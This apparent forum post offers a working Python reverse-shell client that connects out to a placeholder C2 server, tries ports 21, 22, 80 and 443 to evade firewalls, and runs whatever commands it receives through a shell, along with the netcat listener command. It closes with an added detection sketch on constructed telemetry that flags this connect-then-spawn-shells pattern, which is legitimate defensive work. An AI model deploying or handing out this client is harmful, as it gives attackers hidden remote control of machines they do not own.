You never know when you'll need persistent control of a remote machine. The script below is a reverse-shell client: it is typically used together with a C2 server you control that is listening with netcat: `nc -nv -l -p 21`
(`nc -h`: -n = don't resolve hostnames, -v = verbose, -l = listen, -p = port)
Print statements have been commented out below for your convenience.
```python
#!/usr/bin/env python
import socket
import subprocess

##BEGIN CONNECTION ROUTINE
#print "Starting Connection ..."
connected = False
##ATTEMPT TO CONNECT TO C2 SERVER
while not connected:
    #FOR ATTEMPTING TO EVADE FIREWALL, REDUCE PORTS AS NECESSARY
    for port in [21, 22, 80, 443]:
        #print "Attempting Port:", port
        mysocket = socket.socket()  # fresh socket per attempt; a failed connect() may leave the old one unusable
        try:
            ##CHANGE IP BELOW TO YOUR C2 SERVER ("C2_SERVER_IP" is a placeholder)
            mysocket.connect(("C2_SERVER_IP", port))
        except socket.error:
            #print "Not Able To Connect"
            mysocket.close()
            continue
        #print "Connection Successful"
        connected = True
        break
##WE ARE NOW CONNECTED
while True:
    commandrequested = mysocket.recv(1024)
    if not commandrequested:
        break  # server closed the connection
    prochandle = subprocess.Popen(commandrequested, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    ##ALLOW PROGRAM TO SAFELY WAIT FOR ABOVE PROCESS TO COMPLETE (communicate() also avoids a pipe deadlock)
    out, err = prochandle.communicate()
    results = out + err
    mysocket.send(results)
mysocket.close()
```
1) send/recv have transfer limitations (~12k); recv(1024) only reads one kilobyte of the command per call
2) "cd" does NOT persist between commands, because EACH command spawns a new shell
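From the defender's side, the behaviour above (one process connecting out on 21/22/80/443 and then repeatedly spawning `sh -c` children) is a recognisable pattern in endpoint telemetry. The following is an added example, not part of the original post, that flags that pattern over a few constructed JSON-line events; the event schema (`connect` and `spawn` records with `pid`, `ppid`, `image`, `dst_port`) is an assumption, not any real product's format.

```python
"""Detection sketch: flag processes that connect outbound to a
'firewall-friendly' port and then spawn shell children, which is what
the reverse-shell client above does. Sample events are constructed."""
import json
from collections import defaultdict

# Constructed sample telemetry (JSON lines), one event per connect() or
# process spawn. Not real logs; the schema is an assumption.
SAMPLE_EVENTS = """\
{"ts":1,"type":"connect","pid":4242,"image":"/usr/bin/python2.7","dst_port":21,"dst":"203.0.113.5"}
{"ts":2,"type":"spawn","ppid":4242,"pid":4300,"image":"/bin/sh","cmdline":"/bin/sh -c whoami"}
{"ts":3,"type":"spawn","ppid":4242,"pid":4301,"image":"/bin/sh","cmdline":"/bin/sh -c uname -a"}
{"ts":4,"type":"connect","pid":5100,"image":"/usr/bin/curl","dst_port":443,"dst":"198.51.100.7"}
{"ts":5,"type":"spawn","ppid":6000,"pid":6001,"image":"/bin/sh","cmdline":"/bin/sh -c ls"}
"""

WATCHED_PORTS = {21, 22, 80, 443}   # the ports the client above cycles through
SHELL_IMAGES = {"/bin/sh", "/bin/bash", "/bin/dash"}


def find_reverse_shell_candidates(event_text, min_spawns=1):
    """Return {pid: info} for every process that made an outbound connect
    to a watched port and afterwards spawned >= min_spawns shell children."""
    connects = {}               # pid -> (ts, dst, dst_port) of first watched connect
    spawns = defaultdict(list)  # ppid -> [(ts, cmdline), ...] of shell children
    for line in event_text.splitlines():
        ev = json.loads(line)
        if ev["type"] == "connect" and ev["dst_port"] in WATCHED_PORTS:
            connects.setdefault(ev["pid"], (ev["ts"], ev["dst"], ev["dst_port"]))
        elif ev["type"] == "spawn" and ev["image"] in SHELL_IMAGES:
            spawns[ev["ppid"]].append((ev["ts"], ev["cmdline"]))
    hits = {}
    for pid, (conn_ts, dst, port) in connects.items():
        # only shells spawned after the connect count: that ordering is the tell
        children = [c for c in spawns.get(pid, []) if c[0] > conn_ts]
        if len(children) >= min_spawns:
            hits[pid] = {"dst": dst, "port": port, "shells": [c[1] for c in children]}
    return hits


if __name__ == "__main__":
    for pid, info in find_reverse_shell_candidates(SAMPLE_EVENTS).items():
        print("pid %d -> %s:%d spawned %d shell(s): %s"
              % (pid, info["dst"], info["port"], len(info["shells"]), info["shells"]))
```

Raising `min_spawns` trades missed single-command sessions for fewer false positives from legitimate tools that open one connection and run one helper.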